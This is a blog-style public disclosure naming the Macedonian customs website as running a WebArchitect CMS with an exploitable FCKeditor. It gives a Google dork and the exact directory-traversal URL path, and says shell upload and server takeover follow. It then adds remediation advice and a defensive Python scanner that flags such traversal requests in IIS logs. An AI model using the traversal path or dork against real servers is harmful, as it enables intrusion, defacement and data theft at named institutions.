Simple hack into web server of CUSTOMS of Republic of MACEDONIA

Dear my lovely Macedonia,

Now I am far away from my hometown Gostivar and my country Macedonia, but helping my country with IT security is still my priority, and how we can increase security awareness is still my main concern. I published the FCKEDITOR hack one and a half years ago, and as I see it there is still no positive wish to fix this RISK that comes with the WEB ARCHITECT CMS platform. Unfortunately, a lot of Government institutions are using this platform for their web servers. One of them is CUSTOMS.GOV.MK of the Republic of Macedonia, which runs the exploitable version of WEBARCHITECT CMS that has a working FCKEDITOR exploit. So I hope this will raise a positive alarm for the IT TEAM of the CUSTOMS so that they fix this hole before some “ATTACKERS” deface the CUSTOMS.GOV.MK web server or even leak confidential data.

The PoC (proof of concept) is very simple:

If you visit the WWW.CUSTOMS.GOV.MK web site you will notice that the CMS is from WEBARCHITECT, or you can use a Google dork with this custom search:

site:MK inurl:WEBARCHITECT

You will find http://carina.webarchitect.com.mk.

The second step is just to paste the following path:

/FCKeditor/editor/filemanager/browser/default/browser.html?Type=/../../&Connector=connectors/aspx/connector.aspx

This will activate the directory traversal attack:

http://en.wikipedia.org/wiki/Directory_traversal_attack


Conclusion:

The result of this attack is a full ROOT HACK with an UPLOADER to the Read/Write enabled folders, where an attacker can upload a shell and take over the whole server. So, as we can see, this hack is very easy and can be conducted by any attacker who has general knowledge of hacking techniques.


Remediation:

The remediation for this attack is to update the exploitable FCKEDITOR version to a new one or to change the FCKEDITOR folder permissions.
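As an added defensive companion to this remediation (example code, not part of the original post): a small Python scanner that flags requests to the FCKeditor file manager whose folder parameters (Type, CurrentFolder) carry a `..` segment after URL decoding, run over constructed IIS W3C-format log lines. The log lines, IP addresses and timestamps are constructed for the example and come from no real server.

```python
import re
from urllib.parse import parse_qs, unquote

# FCKeditor file-manager endpoints (browser.html, connector.aspx) live under this path
FCK_PATH = re.compile(r"/fckeditor/editor/filemanager/", re.I)
# ".." as a whole path segment, with either separator
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def is_fck_traversal(uri_stem: str, uri_query: str) -> bool:
    """True if the request hits the FCKeditor file manager and any query parameter
    carries a '..' segment. Decoding twice catches %2e%2e and double-encoded
    %252e%252e variants that a single decode would miss."""
    if not FCK_PATH.search(uri_stem):
        return False
    if uri_query in ("", "-"):  # IIS writes '-' for an empty query string
        return False
    for values in parse_qs(uri_query, keep_blank_values=True).values():
        if any(TRAVERSAL.search(unquote(unquote(v))) for v in values):
            return True
    return False


def scan_iis_log(lines):
    """Scan IIS W3C extended log lines; the '#Fields:' header names the columns.
    Returns a list of (client_ip, status, stem, query) for flagged requests."""
    columns, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            columns = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        rec = dict(zip(columns, line.split()))
        stem, query = rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", "-")
        if is_fck_traversal(stem, query):
            hits.append((rec.get("c-ip"), rec.get("sc-status"), stem, query))
    return hits


# Constructed sample log: one benign file-manager request, one plain traversal,
# one URL-encoded traversal via the connector, and an unrelated page hit.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2013-05-01 10:00:01 203.0.113.10 GET /FCKeditor/editor/filemanager/browser/default/browser.html Type=Image&Connector=connectors/aspx/connector.aspx 200
2013-05-01 10:00:05 203.0.113.10 GET /FCKeditor/editor/filemanager/browser/default/browser.html Type=/../../&Connector=connectors/aspx/connector.aspx 200
2013-05-01 10:00:09 198.51.100.7 GET /FCKeditor/editor/filemanager/connectors/aspx/connector.aspx Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F..%2F..%2F 200
2013-05-01 10:00:12 198.51.100.7 GET /index.aspx page=news 200
""".splitlines()

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print("traversal attempt:", *hit)
```

Feed it your real IIS logs (the `#Fields:` header decides the column layout) to see whether the file manager was probed before the upgrade; a 200 status on a flagged line means the connector answered rather than refused.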


Kind regards,

Senad Aruc

Senior Security Specialist
